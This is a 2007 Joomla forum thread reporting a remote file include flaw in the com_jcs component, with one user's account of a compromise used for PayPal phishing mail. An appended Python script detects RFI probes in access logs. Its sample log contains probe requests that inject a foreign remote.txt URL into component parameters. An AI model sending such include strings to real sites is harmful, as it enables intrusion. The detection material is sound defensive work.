Joomla! Discussion Forums
Posted: Wed Oct 10, 2007 11:35 pm
Joomla! Guru (Scotland)

JContentSubscription Joomla Component 1.5.8 Multiple Remote File Include Vulnerability

Component: com_jcs version 1.5.8 - payable component

Available from joomlaequipment.com (problem loading page)

Just posted on milw0rm http://www.milw0rm.com/exploits/4508

_________________
Geo

http://www.dalserf.org
http://www.improveyoursnooker.net

Posted: Thu Oct 11, 2007 5:58 pm
Joomla! Enthusiast

It may be all versions prior to 1.5.9 because I was affected on a 1.5.7 install.
Posted: Fri Nov 09, 2007 10:35 am
Joomla! Fledgling

Hmmm... yup - got a call from my web hosts [small UK company] who were very nice but told me to "fix the holes in your scripts"... apparently someone noticed a surge in outgoing mail use which turned out to be someone trying on that old chestnut of:

"click here to fill in your paypal details... " [yes and the pass please!] - I presume it was this - I didn't get much of a run down - something to do with a paypal exploit anyway, maybe linked to the JContentSubs paypal component??

...all going to Australian email addresses apparently and 1000s of them went in the 6 or so hours before some alert techie spotted the spike.

Thing is whatever they did has crashed my site... spent 8 hours getting it working again today.

I noticed some web traffic arriving not at the site pages but the web stats showed a glut of hits to one of the [many] components/bots script addresses. I think in hindsight this was a scan for the JContentSub vulnerability - shame I did not shut the thing down when I saw these attempts... ho-hum.

Beware... I'm skipping the whole thing till it's been well beta'd - which it obviously wasn't [and they charge!!]
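The poster above only noticed the probing in hindsight, as a glut of hits to one component script in the web stats. Remote file include probes leave a distinctive trace in the access log: a query-string parameter whose value is an absolute URL pointing at a host that is not your own site. The script below is an added example, not code from this thread or from the component's author; it runs over constructed Apache combined-log lines (the hosts, the component paths `com_example` and `com_other`, and the parameter name `cfg_path` are all placeholders) and does two things: it flags requests carrying a remote URL in any parameter, and it counts hits per script under `/components/` so a spike like the one described is visible before the host's techie rings.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache "combined" access-log sample. Nothing here is taken from
# the forum thread: IPs are documentation ranges, the component paths and the
# parameter name cfg_path are placeholders, and www.example.org plays the
# role of the site's own hostname.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Nov/2007:03:12:44 +0000] "GET /index.php?option=com_example&view=list HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Nov/2007:03:12:51 +0000] "GET /components/com_example/helper.php?cfg_path=http://198.51.100.7/remote.txt? HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
198.51.100.7 - - [09/Nov/2007:03:12:53 +0000] "GET /components/com_example/helper.php?cfg_path=http%3A%2F%2F198.51.100.7%2Fremote.txt%3F HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
198.51.100.7 - - [09/Nov/2007:03:12:55 +0000] "GET /components/com_other/admin.php?path=http://198.51.100.7/remote.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
203.0.113.8 - - [09/Nov/2007:03:13:02 +0000] "GET /index.php?option=com_example&return=https://www.example.org/thanks HTTP/1.1" 200 4711 "-" "Mozilla/5.0"
"""

# One combined-log line: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself an absolute URL is the tell-tale of an RFI probe.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)


def parse_log(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_rfi_probes(text, own_hosts):
    """Return requests where any query parameter carries a URL to a foreign host.

    own_hosts: hostnames the site legitimately links to itself with (e.g. a
    'return' parameter pointing back at the site), which are not flagged.
    """
    own = {h.lower() for h in own_hosts}
    findings = []
    for rec in parse_log(text):
        parts = urlsplit(rec["target"])
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if not REMOTE_SCHEME_RE.match(value):
                continue
            host = (urlsplit(value).hostname or "").lower()
            if host in own:
                continue
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "path": parts.path,
                "param": name, "url": value, "status": rec["status"], "ua": rec["ua"],
            })
    return findings


def component_hit_counts(text, prefix="/components/"):
    """Count direct hits on scripts under the component directory.

    Legitimate Joomla traffic goes through index.php; a pile of direct hits on
    one component script is the 'glut of hits' the poster saw in hindsight.
    """
    counts = Counter()
    for rec in parse_log(text):
        path = urlsplit(rec["target"]).path
        if path.startswith(prefix):
            counts[path] += 1
    return counts


if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG, ["www.example.org"]):
        print(f"RFI probe from {f['ip']} at {f['ts']}: {f['path']} "
              f"param={f['param']} -> {f['url']} (status {f['status']}, ua {f['ua']})")
    for path, n in component_hit_counts(SAMPLE_LOG).most_common():
        print(f"{n:4d}  {path}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents and `own_hosts` with your site's hostnames. A status of 200 on a flagged request deserves more attention than a 404, since it means the script exists and answered; the fixed time-stamps and the foreign host in the parameter value also give you what you need to correlate with the outgoing-mail spike the host reported.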
